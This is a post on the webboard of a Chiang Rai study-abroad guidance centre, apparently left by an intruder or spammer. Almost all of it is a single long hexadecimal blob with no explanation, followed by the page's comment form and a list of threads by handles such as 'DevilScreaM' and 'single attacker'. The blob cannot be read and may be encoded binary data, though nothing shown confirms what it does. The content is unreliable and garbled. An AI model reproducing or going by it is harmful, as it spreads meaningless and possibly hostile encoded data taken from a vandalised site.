A364B7BA337680312DC43193FF70AC2D074B0E236051D24C92811476F140AF1F767B2018EF536FB83A6172D193CC6740327588772114CFE91C971106E58AAD410C582A5B770B69D5B02EE2AF8FFC9DFB64E3E1241011EE2D96635C982D1D4EB18C3A7395747EA0C0ACFC8F8E507D50B80914F7831588BE8A8DCBA0BCA596B0F57A208C2D141283B82C03FDFFF044502785CD2B8C3E6770656B7DA4976B0A19603EF79A0B7D423BB536C30231E8135F596B58A5DBFD267778320ECE96F11C1F363015D4E24C5DEDA9F56311D081202B05BD1BA8BEE682FBCA7172B7ED8CD120DC652AB2D6CA45F2FD1DC23BEE7772311A0409EF2D80554D82BB3F46B050935C296A48F37265090742413FD0AF1822DE80740B6B7E9F083E0A795644A5BCA069A4F4C708D3E1F59239E0F879E1F0E23581BF801FB4C8D0D0CC274AB9498FF58EB605EF9B6B9BC2CCA195DE5E0CFD7610CFB3BCC0A2D356783E81066B98D65DF4E021610FBDD7B2DAB58E3412B4A5628FF7667625FFEC8FA9E0B2AF359CB763E10F411B86BC69E5FF47E97AA3E375E6F38288238CA06A19731A353030D1A0BF3E20994FF3011AF572CD66F8618EBCA4A309D228122024567A0D0F7305AFB680E5F3B7108A38AA5B705130493572813B3EBBBC83A5BD92D8F27D1642B908F700EFA0519591A62236BF22D11A99A52D83EE83EB76ED5842600B6F600C7ECEB272E8084C773327AB3ED2947D6994B2C2CB7D47F733D159CAC6EB81627AE18655590C79E5F8CB8DE5A66201A15DB5A2D7A697EAC6B6F75F2CFC723E0065F303DF115F12CB55F847E497B1223EBC683F747AD0085F3F75F0665392839CBFF8FD1B4573514D2DF8CAB0EE30B0BA8A68E8A910FC0A487DFACBFD2EDC8F9D84DD08A91C6D03B119ABBDC73F2B315CCCF3C156327AC896FA22EDF2BBA0917CD793DB04E147422CAAFCD5623501B289D3207A9F06CE919E25C25F7611F3B8A0E971993545E50C2033F53A3F41BAC914AA205E563113FCEA3876482BEE707440C333DAC1880C0FD9FC65A359A416200008F1313AC5D06C92E22F9282A2F0C3F2655787DB4708B05F8A864A21DCC2001017EAE2E4E905F245A0138B2B79DCB30977C5C7D4DAA4D5A20438B467A50D81C325F01AB495EF70B106425AFFE1D30FFD2245A14EBA503B0FBFEE776CA6CC875FB97E97B0C6F1D1784CDFD6E78E3BD2A54451A200F40052D5B1EF0AA4A48F198392B1814D9BF05765DC54246BF74244DF3E71E5B1432BA6694F125C98FD87F22586E1E5C743AD426EF83B2076D3B870363DE2D239EE657204F4384A825200B21F4136B291343472AF15FF11A1443F13CB889C78F152211356B9A0B054804814FEDFB7796DF6C9ACD53853D5B34FED6AD2B3750A7DB58278B16422A0E54A08B2CF0AC99807B03258107343F0B9D27A9D9AA3754D3A878FB8D1E866E99C4376336D85C03D361EDC8EBB40CBCD01AD01A25CF434CE1B13A3B5DAAA513428B0645051C64EAD78D4267D8A652F50A505DFE764D6DED4689307BC19EF82FF14165CAAB58ADB8A20D24C2835F76EBBFEDDEB9326FC91F12712F6946D9465A221E4B0F3C52914C0950373192029E0FF393679CAF1C211B10C53B000245251B5D064D207C1F77F15A065D222EC3CDF56E6F6C60E1CCDC62112044210D1381F5C9E374232704792CED4C52510468443F37D416D90E353F501A7C75A20BCA61E9F50DAD3CEE1B245E42E8200E89D2057B6801A3D16F9D208230281EE5D9E39F6FFAFA6520FA23147C8A0C1004F468092118187A070DEF110F6C3CE03C2F1ABAE02EAF311BB89A6E6BF77621E40278FFCCE35074BCEEECB7195D2E8D41B16B18A831D68B25E41AB7945D9C0DC3232E798D3CD01A8973C8270BEED8F54C3450E8B7B2C77E3A4CB1422F99823295DBA8A9E1C518DA13468DD2B112DCDF242220C7E599C968B795695907BD487153424788B22CB6D4674D64B85D13B3E2D70F18FDE32A8DDB099D004D17B5FD28137B161B1FD830573077FE5C8F10C601FFB02155E676FB4707F2EBEBE478819361989814D53CA7B6DD3C484D176E3E6BD47470AA022C465D47530B5F3CB1CACB19D8EB3B376157C9EB201B8AF716E6070F8044945DFF00CC58B04491745EEFE336D82596363E4662FB8F7E1105A2C33B017AD301F5E7872E087817C72412F13CDD5131BFA715EC15A01D21DBAF1C00DA6A6BD9E8D5B44B16BC8911263110F30B1B83BB44AF3E5F333E5951D7B572BDB43B5E1C55B22096D30668632C93E14C60580348FED43BFA8D8608051C13F30A0EA234F062BE3C4F5305BC509F7230472BC30A5B4F8DA99B02CCD68C35F30D499C6D59ED7CD19279C10328D8140B04F6668A43E5B7993451A3714EE0F2E7C2A35BE8BB8E70207BAB398BA109BD47D66BF9F4532B418BED7327FEBBF88A710D926315E753A7D6A64A6E6BDAE41D97574237AEFC0BCC18CB727FACB732C0FA9960B53D9B45718EB5E028B2228B91C80D9CA5B1236020B8A14F255D1D5CAF9DC9AB4092055415D55364F81F208B3243A2BB318BBDACED4E22CA4E782B30ECACCA2F7012FC4F6A43AFFE1CEA0DD61C1373722418480438FFE017A72F4F4D31E67D2DC27D0730367B98231A2F268F3B44EB87619C9B24260B03ADDD6031981F4B077B95821DD50383E9369048B5222AB3661632827450C21132FB6301B6F81726D8E7676F881763B7843543E812F5407FB0434B3EC087DCDC873066D02C17C87EAF17AD668DF52DB609E043DDD122CF5FC87DD056187AC5B1A144B03D9CAD9E180B894804129A5D019A1D4BFED504ACB9FC9E3A25F8A85F0568A37744BD673E921AF835596748FC3C3857FC5155058D82E73CA2E0DED830901EA2B95C1497CBA8A0EC8B2E9555D92632BC6B8133FCC026CE073EDD464748645E4B4CF942F1B7C9DD802083B30A800419156F5B8A044E2F1FC9F0FA9E4B42553AF955B72DE4F481135A7A68E68D0F825CAFC46ADD133117436810CF10284B1BAF0D5380CAD01215196DA2CD42A55727DEFEDDA63D1B69E378A02915834D474868CBF4D36F22BCCF97BB640F607109642854F11D38F2293FDD68F7501B99577EF6A55D69A25E7CDE2E2303D33DA0268A3646E03F0C3CE165F424FA22A24F7C8314B4253334AB063F1FEB0DD0F907A834942C529D5019672DB3852B0404A68496F61B460143443B79CA233836096369F954852D2359C63314E73F74686EF43B39CC4AA83F2A1AD3D9296AC0AAC6D2903C484D964AA9AD94161C893CDB612C1DCB468C8423FA55C75FD89E03DBEE5D5D2575F18DEAFF5CDE27F035B9986CF39509A2A121E11943454052DF2D6505D53B0A43DA6220D4C939462C6C16CF0AF45A02AF88EC37EC7B1D2414486E3D00C73D55E155B25146B3E7B49F422F165BB58B0300E548BF78AEEED81D4E5E102743FA27899D7308E1F228A84DBD13F8409B86F5F8515EF0C2FC26D7D3C8FEE4E03F52F5E68B93200A3C1BD7D3C8FE30347B72F5E68B93406A5C7BD7D3C8FE50541B12F5E68B93604A7C5BD7D3C8FE70743BBAF5E68B9380AA9CBBD7D3C8FE9094DBD2F5E68B93A08ABC9BD7D3C8FEB0B4FBF2F5E68B93C0EADCFBD7D3C8FED0D49B925EBDD2BC006F1C331A0F0A0523234F5E3D7A03EDA03AEAC8E04A2566726F243C5C4305326C4B67121F3E43596D6D2C2003D83C13486159725B4949604525491E7C7A0BA6BF42FB225E4B507209411F614D564320251E2C6F32E4D720B204775D35534308656A7155A0ABBBED75671B274B7A243E0056487E716F76C0F6FF263C534B377B4556645B70690B6A69654A603AD198A4B7034778594F577752451F03544D74286F48606B48726E52B7DB95B052593007435B6613224D324569B91F0F52F59CA5705E34677E6F682E49451B1E71617075076B145FA8F5F6C9747433124E4626376C727B47314763D16140432D53F58DED686079541F5F64282E03F8A2C27F4717645C58587E7F4438479E48164E734E13369C07FF7C407B8D636527CB586F2754CB5D0E6571C4DAED746C9127497B4032644B4743E87567E03E618056297A2C1A6E96348A8A76177046655601FDF4F1DE110D515EDEA6B2A1481819398F40AF997F4F770476697443616C0E2BCF5C3A681798560E5C2535454F542B18CBAC3651641C5E186F30BCE617D62F2F449A0E2E748F79ECD165106775393AE55B0C23F121324A25010EB399EA30E7260FF95299569869714886746900E1F8DDAC28430CAC5C59566D70C3486C2B5F3D4BFE542F0B634EA71F180EE6E7282A24C29FF8F0E487F777DF1F0E29C61789B1872043EF09E3358F1E570C5F732033FDC6719B23204D17595E3B6253207236201D474164C89169735048208264656D43302467FE6B41D4D6F1A03FDA0A01D04D200450C8E5297B220D886621008DF3BD6F4720338341934AC49F4C37BD10CF9C713DA3CE212515E7ACB5E8330C00770A2E68F8AD45C0489E16CB00360B02B4DCD1482C5B07223436D01D76D01E3453493BBE9F5F60F778302BE3D19630B749B7BC3E425BA42BB381E6306CCE011E6D3A5856370FB0BE19FE8916B2F2CA0A6D20ADF5812964D575CCDB170E115BACF8DE8B6E41752609FC91BB729A18E026878EAC75E08A4FE4BEECC71E0065D26C6448D76C6353414A36CCA05FEDEC568D9D48CA4B530B8BE49F711B13145901BC408FBEFC34035E7719B5386042158B564736A65BAEA4E3219FC794D933E4F7F1D54C0FF865775C2F8E12341A2E8D4B42A6092239CE26103475B0F5B5072F1357474127BC4E9373050F6704762EB6DF997809395B47B91D7605929F8A1EE819D5F161F0D174D406321897A9934FB5C4E013436A512E24671001771CE3C671FF8089F5D2D9B0ACEF90ADC8C598C27683FA4B3D3E299A69C0DDBE125D1A553A5AD0BC3A1F26A0D247D69D60E3DCDBA1FFE60237DDE9455A236B73F096B0CDD90608403C8ADCBD87BAB667632DD7AE96D62ADF570236AE8440178792EF7378926AD7294994B5C97A156D23C51882FB55554D15F9FAC62957CC34C58A3939E8E21D3A98434E7E6CED2444051F05FE3FE000FCF553C946AD95BDEF7E2111B2786673A0DB6851D98446F846BB3863EE764110773902F5DD0271C6A95323438290D18313057E95367D6921E113368A5DFD2A206401D032F6DBDB690E16D39B271F99F744C86AD928D048F2D2A56CE0E428F0064F0D86CE9094078902BC313D0A3F0F21CFD3250DA445C871B6E909D79F3C026C8E00379B52D35279165A1617AF49C82013B1720D4C6645F64411488F1259323F40F00EFD444A64C8AA382F3E4A5A68266A7C86BC934D8A772DBEF0A9F26A09396148EE0A58A55E5D3E3BE1E3FF840A14C8461D296A41A8933DE61FB51E81D0A1D88F0173E67FD705E6EFE4F825C8B63D383420DBE3A27A3EE6954B3BE450E007378032AD273A6332A919E2EBE22025F20C57A3297406BC2709F017E91F05DFE3A9DDD1A1BE778304D6B7D8E31379487242F94AE42C2C3C1CCAEDFE168704BC4C2ACE7E5CCD027D7E6C2DCD8D1F67C6FEC960C339AFB52A87441F843BE4E4B7DE6F476C5CB32E3110BEF138694A773A38E5BE242A16629407B72773F5A5A432429E4C7C28878C854B3E1D4E6169F735604BF8B82109A7A2C9F71747A3A4BE1EBB03DFDEDA0985259B0620AA1C7FC2AC9FFA64EFD71935DBC8AA28289A2BEFE20C62310C45104646882A0C515B18C93F797E7A9EE9F7677D030933D3E6FE99EDE6304B4DC5B1DFCBE752B62823F1025356AC4D3C7FB08753CC2C361E469C04009206DF963F1A8A5259D083C835586A3C1CBA4151D166BDFC23BABF5D1087760FA093BF410F0F8831153A6AF446400F00649926E25D59D1970C31707581940C747DF4ACB103E6C767280AC56A9B9E7CA6097947487250EB34F3BD07C53FF301D6E62CBD8172608B67CA2F00741EB8180A3F3962E23C8F52534E1AE6CBFB9F8E37827E10B92DCABA7B135E21C525A62CFEF341651C86FC947108BEF3B4532F91E586EB679E3B1ADA4DE02F41810D4686379505B75C767E146301D7D3C35487BACBEA404CCB7761BCE244949224A0B3F6F2C1C0534A3FCCB3B31D869335C73E9DB302B557FBD998191F1D7ABDD41E17648385B62BF9653657580CFF93B554958830FD1AC81085385EAEE0A038AF1AA216E235677DC87825F9335E7145941A41B83E364BFE5CFCD1010C140DCCC0CF38C13DC397499B6298414320A4592BCCDBCAC41FC99563113282ACD10DDF3CDE40800B0133807D157DCB53647545049F3B963B4A067F062DADF6BF3D22DFFEB0FF573EA30043C3C2D1BC57302416DF6AB83A23A0EB4B1E7EAF60ECD98A212DA324889282081CB1C2D19A71E40D41C8E0E4A614811C714C3FF38CC35B32950FB626185083AA515460F52D5E7F2C9A3C19B705C2B36CAD95F10EED400F320149B22EEE6A0E298DCDD42CBB4442A3BE62FFF702500CE2F4A0F24D4869D82322DFB320C3432042056EE05D6670C3ACC53E2D39BE64531C406E652D6744A038E1847C07226616685C4E321B0966AAC303960A409196805619E616A7C65FD1F8CA9B7B5915EF7AA328BA662B4C09FF5C1088334173515FB6D86CBE14505632C6A3A80D1972B8647C774AE40317C5B237A3705F1F682C028B4395137181421853EB43FC5C02D5B9253F1931C549502809EC32C17729060C42C859B6825752E2C31FC16BA716DD155ABEF893E609C7023FAA7714C98098F0B6C9C782A716A7CF301E7EF1C68E0FE8E1FA116AC6995D0FC6AE0014BD8D7F3F054AA2404543D10424FFC094DC28BBC8A651477DAFC5C4BA00FEE258D380310347E074D49488571B440AAC2372735B89E3505731883453549E10C6F999EB566133B4197B07A2C302B03D94ED2D306375A67003540A227AEDFE71D6531A38278B1CC5A2E65B165F30A7FF32111B5752E402FA4209002C9B39370528B6E58B00679145425389BF05560E763C6C1E55641B602D7C1DBA072F1B752704E99CFE56143034B2180198760A1FFF395EE1FE235086C7E911B64019A1344FE81E85B8EB6D2BEC566A67B6C60BC5C91C05ED420E93C2BB1DC42C0229ED06C5DF382C41DEDC072D7F8F670EFA435D337387087EAD53B39A6A5B8872775B1CB56226681618BAD484CDA73232C6BBC8856A06206F63F8E64FDB8B1578E98945637645CAE0BDAFCCDF423203C4619DBD170E3EF29C3C90280196ECCCCA2F9E069A8B01E603CF7647518F18E85AD109160B014E1706F3C7C44F29F52866F5380BCF5811C7D1DF3A83782892ADAC5909299D1395194FD9B2207D287DE552DEBE84911233518C79292B5B6C660B49C6EA2EA404666D0306C10C3E609B3B685C2E4E70937A9A48674B0EBA8F7490A86FD7A9EC4AA9A2D5DC09801E2CBD107B98AD215AC1E914B631021E688D726804A9CAB8D4EE68DCEB33F66CFD465B4A22002F4056E99E070CA629F8584366F65DE7D4F4113253C3784E3090E6F98A8439DF8C1BA44BA671FF62BCCA02D24ED1E570E439350FCCE6FFC9236253BCC0D6BCA4F76531883F31F7C9FF5EA7A278061F3B1D3F9276B96B12670C57630367F06001E27274FCFA385E37390AE00C356806DFF366E8C8E0184231CAA81BD9CED5D29046E7EBC84B2033B884917661683788D830E6746ECD1651D4812C5F2B66144857866E522923E07477727253B86792562F321C2632292B2A31560A716A0496C0B6D7AA87CD167405F12B28CFC2714FFA66371F03D18D972B6FB55FD381FD4E1F508270F6A66C1B0C0B423A2867F161FB4C507C2D4CB4471722FF13934DEA3F134AD6CE6672E130D0B650C88B86F5167177263D72F5030015644D984E2F192CA961B87FA6E10030D6A950ABCAA3387EAB60F91C44051A7ADD92F6B6A84F9CDE689C52FB7022A8CDD13150F81544313F5FB31BAA9B9132C658BABA095B2B8F93007356817C3CD7107B3103B929B5C3FED11A5EECE28207AF1024307A9A01FB664F604D1BE63B2CDB80DB8DDD709CACA45568305C1E3326EFFF8959B1365FBDC473D0C8EFF5341CDB03F703C205A5E1DE65D935014A639398C13EC625BD5150290A39E021283D6C1F040682ECF395C22A74D30167D57A171F3B1673E4C219BFBE2F12BF221645240F7E6E832928DA423AD7DB6195127F47C382695E56CFC24C0C964A5262ABAE75608C4DBBDB1AB9DE1D98D1D998D9D1009BFBB6FB83A8ED182002259ECBF37128F016576657A8496FD8589F50CC17F458F9BA5B6CEBE1E056978C9AC12AEC17C776C3B5720947474AD02AE0D51922421B27305F880703962BD81A41586C2B3F3D8F4048E168FD491B2D2461A9D044718511833AFCB8F44BCACA467B00A51DBAA21A11951C041F66DB8AB5775A92FBED0E7E46D4E68DC651439C93A08ED262695092BD76E1925046A1A51A18FD83AD971EF6ABFEC7EFEEF3E5D1F679818E8BBD831E40B88026597AAC7CBAED058EA7747F1FCF74C6CD505CAD0FDEE21844A2B41A2A0940F8377342AB7E53794632F980F0AAF04C0CAF83A6390A4CCEEF52B98AA076BA390CB284586FA1ECBB453EDAEE7518F00DD1EB4C016A46BC3372BD34F7B17DC4187877AFE04E41C250669C1DDF553C95DAC01E1902BAC06B3B24F8205B8128E8133C19F80F7A02E2440355F2564EAA760D46C9B3A302ADAD5903D9FF1DFD7132DEEB5DE5E04FD52E69ABA5CA1CC048C4F3E463F351C595DF9003D672F018160AE5FE7291ED8EC33554B07D7C87321F6A37333F25F7D91C4E6A020D7053266848390A134972AA2DDA5809DDEA3ED52BB2AA04E3478E6AAA17AAEF5A9962D7B4E4A60000B9BDC2D14C9227D72DA71F1B4BC9FFFF74B1C2654D4092D13724FB254923930F37B0C3D1BC7484525CDDE1E4FF33564C0A5B49CC805E526B6F978E247416203FBA9BB22E43C38E2E14EEA5B6F4F19B17FD6C65303A04B0618925A42C892E234642139DD62D13E85A086A7AF3D6D81BA981474B2139EF8CB545474D94130E148478299AB12A57191FD606AD042717F4EFFC4F79A6F956137B007D95076A7F7CE9717C22D70411E2C3025B3CC4599C183C191A3832EC36C5985A9203C589344BCF95B067B90D0E1015167D1C01056A6E6B0A6925B1740AF12CAB339722751676191044E65B026CAC95BC7A0778D36F25BB4CBE59EDA80E1C1AE9ABD92CCD74D007437AC32EADD6002D50D7730BB5411E5707994778120D561D036973AD2019633C1508F5D35CA3F14C55CB289ECEC8171B5BA89F7CF64A42A59A4BC06A737627D4B243CD681AB9A53A803587B2C2335213318427A7E708E5D723C1010A0FD094B88D574E3FFB9434C672003520B03D792603E7C6720375E4152C1797C1968F90E77F29843C2E4D5A9E043F201FA8BA81E8C3C3462164CA8D260AB17735F0C6676C466D21221D428F2826BD1CDE083C041C4F6CFE2A545CCCC19D57093F44C610E4732CB1E586AB4CD68B5ED727F8B5F60C236A4DD852CA8CC1829613F32CCC549652C252D671480B2F9D4A5669C951E4530E94B662415D265B215DB0956F5D82E7B6A17A745A195788891D15A3AE07B526D136D239E6B0D9EF669F8D0406E6BE39C84E3D0CBADF7CCD99371FD08D36002CBACF418DCE5B00A29E371F0BC45011F42D415B5DBF7181E50DCE1A1D7265CE117B47ABACCE3985A737295BD0012EAC6C7BF8189A237C754B9877964CE7703C9BB355CEA4A7D93D6EAC272AFF35714CCE8D80C1125478729E930911420CF880F5CFCEE149FD99AD32CD38DF0990A62C4FA721CA6EE0438A0C1F3E771A0EA00A46C1A3E0235C8BAB0DD7072DD2BD2BAB9BE85E2C0BB8B5835359ABC5D003C1E54F1015FE7746408C77C05EB8A6888D9FEBF2A8E3227EC7042196F290C46F3AD6684EC13B0FBAD2414A32CEA5C3662D1894A3AB83A943F1683283AA0D2DD9DE2E632B67367CC4D23CD5EF24DBCF7163D4EB4A46D5A7CA38DBF62322B7C766B986A1CABA358DF134161E63EFAF1A88B09C54A52AD94A0B6641341E796D6C42BB869D650A4BF30393997F7061AB09A577E064A988D8F01D0A9F683AA71B051873D288A24C040E88D3F00EB6F07CFFB0C65AD7E53D60F7416406FBA53189168E6F4013BFEB3F5A00691B5FD5C93DD70E42E4C389B3CD2D4F3CF19E9C83969309B227CC33F03D46B76B38EA9EBCB16963DA5D30C00C1933AFE69F2973BEE5BE1880EDE7F9B925A87633DC1604E24405C67A77BA49843ACE235AEE527277763F0339704F2B9812A4B0893DF032800312D74AEDA8B3C99E3C03576CAA39F43C5BB8F473324B111E0F6377731C32A6B9A6AD2611E9B0F7353E7C388B0A1F9A842206433871F3CB256A7D534D569377AB7D83BD8923CB2C3E7960FF8D2340D495D8FB5C0936DA02288AD273DA75BFF80A11154D325938022E60022F3E6450738912F8AC2330C5655A636855BE780206C34C71481B7CF845743A089D9BF0D97F099E9243C06483C0E95A54C7326E3C7432D8C2DFE81DEC42E245F38458FBEA623E372AFDB899ACBC98AB110B34555E0CDEA744BDB74248874944A89903E5B38FDFAD57715189C2AD7AF161FA5E640B642E3F03FF242797D0CD6C1BB1744FF24346335C72AFDCB89D76067BB55ACD80B2C81484B8087053E4ABABA2692109363BF0FA8E1C9A90484635B12A18C098DDC86B90D0805E8C240358A7A67508C51E7A5C66A706CA23167DEF5D9CC80E819ECB4D233DBEE8ACDD54D2DA4F0BC8DAE3530A2E2CDC20B2D2B7A7436883504A7EB7AE1B02199E3F9AD83D7BBA63A8C5A7258C848D93FD55CC6DF2E7F2088DD990CB75E74E8084517C77560AB046160297A35F2943161D654BAA5C5F7BD8C9761A15911054BA1F55B6110ED2FF78270270392DF4FC0AE4C3C203462BC39865CBE9075783EF2D21CDEAB6F159A575F7E7C23AD0E32A8C4538DE7C6CDA110684A9C10E51787858189D465F841BAAB24B2F65112C1A3E1199CD22452E54BBECDF366CD76A0AF1308BC155FE382640CF3EDA22B7709277323BD8974C0386BB8101100C1C21E74257A068C17B5F4731E9BEAE090186ED82F0E9864F801A2D3908918D36A38246AC7C3505838A5205F5DE96D4D20CE86812724E680C826D1C1C80DDFFFC148CF00A060B179E6D319F02EBCD5E00F4C3D9D8DE0115B775224DC2C135083343FF66D70CB8711E1CD52A454DDEAA4EACAC5C06CF2A43A854DDBD2BF7D4087C54116B518AA40D3213C76118011E6EA616C616D72ABE7273172CD5A5990EBDBB124F6CB06466EEF32A091D9E04253A74BB285DE87CE81E46425C0FEA11CA1525148E07C89D3C7B49BD00FA6463385CE369FEB58F1D0355F1EFA3361E781EF2796735092C81521BCF8325BBE2B0C8470C798F3864362350271D77201114527DEFDA5714D2CF98427A024E13C8A903CEB7E627788910FA11593139319D202BD93D57E6E0C3CE02A708C6C74DAD60747C5E4D477010B017BE80EE5EB7C2D37B524162C3014E594C6B38C5F54C56FAB35E1711AB0D6CFA156CB2461587DA5BFED8EBB7213B7530C6076809D63F467E471DD4BD19DD7E35DD2056A25868A1BA2BD443071D7A8AC21DB3A14C30E36837C88E6B291BB2CE857693F547912EBEFCF8E257A637BC23A2729040B88882CCA27BD6C6E8692B749B7052F2C5EB2D92D0C24217690F92E81CFE2E56B64B5C5D93255B0D717872EADC63F44852835449D30768AF621EACD693E04E489555106817E40EFF1010A0FD328A1ECB517BDFFA01DE0DEDC48D528EA401ECAFFC21B5279CBDC618C8ACE374520EBEB44A9E7BB76A9A8A1D67EFEB106A6334453743993CE71AE332B33E4D17273658DA6068FE98093B48219E18A77E04BBB28C23F31973B03163DA01099AD06F66192AC122372760E354CE4FF3F4EC3E2699A744FC99EEE6C9E755F9E986EDB29DE4D3A7875392BBEB692253FB717D53E780F19881BC3E137D1D5CDE1D2281AA2F7DD397F000E283E6F538DB657A273DE4235F12EF52C031061D1C2E171CF23439044697DF50D6A7E4551437CE60003626E5435E2928D630145B1CF4D32DD87E571B497F2B18270BBD7B773F5F6379AD956C323166C6CE2008CB749B43BC0EACF1095AEEF72638250C84173C95193496329C7E8F47A8679ECA537AFF3F02C0319123D80C1BAD635701784B538FFC805C444487DB062A73301D993BCE1A1D206A7B00435B47D84E40C82E14F1701BC6C35A120DB44432C642A8329733E0065744873C71141FF9545121B1D69752AE793600A825EBE1A44FBC6839FD1D2D56E2097ECFD3024B66AAE0242FE5142DB32615964D45DBE49345BE24D06C7ABF21DF261C219F411C3181162557143726620048C887D34E3857435BB7D0EBC869A9EE7EA92129052656145A83E449A71A561B747EF2DE373D2E8F23002E7E1171AB37AE0A6B3E450752D354197A5947E1E4FFA65FF2606BC3D1BC54792E147D213A3F7278004380452E430503E69B8CCBE4FF1F766413F3F3494C504DD713E254364DD5DEFFBC1EFA41693B7971CF8225CF505523D5997B393922EB66909538382C77510803FADBA2559D058193F02C451F7FEC28D85ACAB9AC84D6A0BEF361EE17406635D23533F507E2E657FD5120E8C6B06774F00A0EB653BFE0D6991C6FDE0DCC9F8E7E9EC46752051624A5E44022F0ECED7A607B2BD32489DC75BEC880D6EFE4DDBD0D14CED7C830B8B16BE045E11A0147E87686824A3AABE206ED3CE88E148CC
โดย : www เมื่อวันที่ 24/09/2014 เวลา 04:31:51 

 แสดงความคิดเห็น

 


   
 
     
รูปภาพ แสดงผลใน Browser : Internet Exeplorer 5.5+
  ชื่อ **
  อีเมล
  ใส่รหัสโค๊ด => 91981
     
   

 
  10 กระทู้ล่าสุด ตั้งกระทู้ใหม่ ดูทั้งหมด
 
   aone  [04/06/2015 เวลา 19:16:42 ] ( อ่าน 10 /ตอบ 0)
 DevilScreaM [26/05/2015 เวลา 10:34:54 ] ( อ่าน 18 /ตอบ 0)
 KAMPRETT  [04/03/2015 เวลา 16:23:37 ] ( อ่าน 70 /ตอบ 0)
 xxx  [13/11/2014 เวลา 00:42:01 ] ( อ่าน 226 /ตอบ 0)
  single attacker [24/09/2014 เวลา 04:32:53 ] ( อ่าน 222 /ตอบ 0)
 Untitled Document

FRIENDS INTERNATIONAL EDUCATION CENTER
ศูนย์แนะแนวศึกษาต่อประเทศออสเตรเลีย
ที่อยู่ 60/5 ถ.หนองบัว หมู่ 12 ต.รอบเวียง อ.เมือง จ.เชียงราย โทร 053-716689 , 081-9801418

  CopyRight 2009-2010 http://www.friends-inter.com All Right Reserved. Power by : Chiangrai Enter Soft